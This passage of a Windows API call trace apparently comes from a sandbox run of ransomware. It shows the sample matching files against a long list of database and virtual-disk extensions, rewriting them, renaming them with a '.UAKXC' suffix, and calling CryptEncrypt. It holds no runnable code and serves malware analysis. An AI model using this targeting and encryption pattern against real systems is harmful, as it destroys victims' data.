lpSrch=".rsd") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.007] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.008] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.009] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.009] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.009] WriteFile (in: hFile=0x6cc, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.011] WriteFile (in: hFile=0x6cc, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.011] SetEndOfFile (hFile=0x6cc) returned 1 [0141.011] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.011] ReadFile (in: hFile=0x6cc, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x146, lpOverlapped=0x0) returned 1 [0141.012] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.012] WriteFile (in: hFile=0x6cc, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x146, lpOverlapped=0x0) returned 1 [0141.012] CloseHandle (hObject=0x6cc) returned 1 [0141.019] GetProcessHeap () returned 0xea0000 [0141.019] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef44d8 [0141.019] lstrcpyW (in: lpString1=0xef44d8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0141.019] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.UAKXC" [0141.019] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.uakxc")) returned 1 [0141.020] GetProcessHeap () returned 0xea0000 [0141.020] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef44d8 | out: hHeap=0xea0000) returned 1 [0141.021] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.021] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2510 | out: hHeap=0xea0000) returned 1 [0141.022] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0141.022] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0141.022] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0141.023] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn")) returned 0x2022 [0141.180] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0141.180] GetLastError () returned 0x0 [0141.180] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=338) returned 1 [0141.180] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.180] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.180] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.180] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.181] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.182] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.183] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.184] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.185] StrStrIW 